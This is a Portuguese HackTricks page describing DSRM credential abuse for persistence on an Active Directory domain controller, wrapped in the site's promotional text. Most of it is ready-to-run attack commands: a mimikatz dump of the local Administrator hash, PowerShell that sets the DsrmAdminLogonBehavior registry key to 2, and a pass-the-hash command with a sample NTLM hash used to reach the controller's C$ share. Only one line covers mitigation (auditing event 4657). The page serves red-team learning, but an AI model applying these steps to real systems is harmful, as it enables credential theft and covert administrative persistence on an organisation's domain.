4.1 KiB
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.
Credenciais DSRM
Existe uma conta de administrador local dentro de cada DC. Tendo privilégios de admin nesta máquina, você pode usar mimikatz para despejar o hash do Administrador local. Em seguida, modificando um registro para ativar esta senha para que você possa acessar remotamente este usuário Administrador local.
Primeiro precisamos despejar o hash do usuário Administrador local dentro do DC:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Então precisamos verificar se essa conta funcionará, e se a chave do registro tem o valor "0" ou se ela não existe, você precisa defini-la como "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Então, usando um PTH você pode listar o conteúdo do C$ ou até obter um shell. Observe que para criar uma nova sessão do powershell com esse hash na memória (para o PTH) o "domínio" utilizado é apenas o nome da máquina DC:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Mais informações sobre isso em: https://adsecurity.org/?p=1714 e https://adsecurity.org/?p=1785
Mitigação
- Evento ID 4657 - Auditoria da criação/alteração de
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.